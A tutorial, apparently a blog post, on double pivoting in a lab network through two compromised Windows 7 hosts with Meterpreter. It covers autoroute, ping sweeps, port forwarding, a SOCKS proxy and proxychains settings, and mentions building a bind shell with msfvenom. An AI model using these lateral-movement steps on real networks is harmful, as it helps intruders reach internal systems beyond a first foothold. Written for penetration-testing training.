double pivoting with meterpreter
hello folks
today we will talk about double pivoting using Meterpreter shell sessions
I will just focus on pivoting and some techniques – without exploitation because that, not our topic today
at first, this is our topology
our machine Kali Linux assuming as an attacker have IP = 192.168.40.128
the next win7 is assuming as first pivot point have 2nic first IP is =192.168.40.142 2nd IP is = 192.168.30.133
the next win7 is assuming as second pivot point have 2nic first IP is =192.168.30.131 2nd IP is = 192.168.20.130
and at last, our target metasploitable have only one IP = 192.168.20.128
at first, as I told before whatever how we gain access to the machine it’s not my problem today assuming that you find to exploit in first target win7 and you used it to get meterpreter shell so we have meterpreter shell we will use command ipconfig to network cards for this machine and see how many networks this machine connected to it
as we see and I told you before we have 2 Nic first IP is =192.168.40.141 2nd IP is = 192.168.30.133
so we need to access to the other network that we are not connected directly on it
so we will use command #run autoroute -s 192.168.30.0/24
then check for routing table by # run autoroute -p
now you are ready to access the 192.168.30.0 network but in Metasploit, so I already know there is another target that ip 192.168.30.131 (second pivot point )
so I will make meterpreter shell by msfvenom and make bind shell to get meterpreter and configure handler to receive connection for the second target
also, check for nic's via #ipconfig
oh there is third network connected to machineΒ πΒ as we see 192.168.20.0/24 ok let’s route it
now we can access to remote network 192.168.20.0/24 and as I told until now we can access it in Metasploit so you will find many posts and aux that work with you, for example, I will use post/ping_Sweep that make local network discover π
so as we see here we found many IP’s such as 192.168.20.128 that metasploitable machine so what about using another auxiliary to check ports open on this machine such as lovely Nmap did π
so as we see here we have many ports open so you can deice which port you will choose to start attacking his services π if you are web PT I know you will look for port 80 and if you network PT maybe you look to port 21 or 22 to make some brute force attack
whatever which port you need what if you need to access this port locally, for example, you need to access port 80 for meta through your local web browser to make this it’s very easy mesy you will use port forwarder so let’s forward port 80
from last meterprter ssestion we use command
#portfwd add -L XmyIPX -l Xmy-localport-listen-to-remote-portX -p Xremote port i need to accessX -r Xremote host IPX
then you can access this from your browser like this
now we finish examples for used Metasploit aux and post and port forward what if you need to use outside (Metasploit) tolls such as Nmap etc. so here we need to use a module called socks4a and configure proxychains a
t first we use /server/socks4a
after the finish when you use command #jobs you will find 2 jobs for socks work
now you need to configure proxychains file
here I forget to take screenshots π for file config but it’s very easy
you will just put 2 lines in the file
socks4 127.0.0.1 1080
socks4 127.0.0.1 1090
and don’t forget to save it
now your proxychains is ready to use let’s try it
it works fine without problem with Nmap
in my case, i use proxychains4 that better than normal proxy chains
in conclusion
I would thank Ebrahim Kadhi and Eslam Medhat
now we are finished and I hope you like my topic
